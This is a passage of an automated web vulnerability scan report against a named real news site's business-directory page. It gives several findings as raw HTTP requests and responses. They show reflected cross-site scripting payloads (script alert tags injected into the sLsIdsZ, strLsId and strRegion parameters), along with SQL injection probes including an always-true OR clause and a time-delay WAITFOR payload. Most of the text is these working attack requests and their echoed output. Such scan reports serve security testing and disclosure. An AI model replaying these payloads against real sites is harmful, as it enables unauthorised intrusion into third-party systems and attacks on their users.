GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-52817588ccf"><script>alert(1)</script>8405255afb38ea220&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=HHDDEGAADKCGMBECLNPOGGHM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsZ" value="125-490731,125-505509,125-552073,125-512867,125-528218,125-528217,125-546102,125-564120,125-564628,125-52817588ccf"><script>alert(1)</script>8405255afb38ea220">
...[SNIP]...

4.325. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsZ request parameter is copied into the HTML document as plain text between tags. The payload c1aac<script>alert(1)</script>eac5f197a2c was submitted in the sLsIdsZ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175c1aac<script>alert(1)</script>eac5f197a2c&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175c1aac<script>alert(1)</script>eac5f197a2c&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%
...[SNIP]...

4.326. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strLsId request parameter is copied into the HTML document as plain text between tags. The payload a34ae<script>alert(1)</script>c802af573cc9f54f5 was submitted in the strLsId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281a34ae<script>alert(1)</script>c802af573cc9f54f5&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:42:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail
...[SNIP]...
oupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281a34ae<script>alert(1)</script>c802af573cc9f54f5&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3

4.327. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strLsId request parameter is copied into the HTML document as plain text between tags. The payload c870b<script>alert(1)</script>cf331f74e79 was submitted in the strLsId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281c870b<script>alert(1)</script>cf331f74e79&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281c870b<script>alert(1)</script>cf331f74e79&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3<h1>
...[SNIP]...

4.328. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strRegion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f589"><script>alert(1)</script>cf362d1141a97933b was submitted in the strRegion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas6f589"><script>alert(1)</script>cf362d1141a97933b&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91597
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=ACNHKJGAMCPHCLHHCAAOHBNH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="strRegion" value="all areas6f589"><script>alert(1)</script>cf362d1141a97933b">
...[SNIP]...

4.329. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strRegion request parameter is copied into the HTML document as plain text between tags. The payload 65e36<script>alert(1)</script>9f3b17ba795 was submitted in the strRegion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
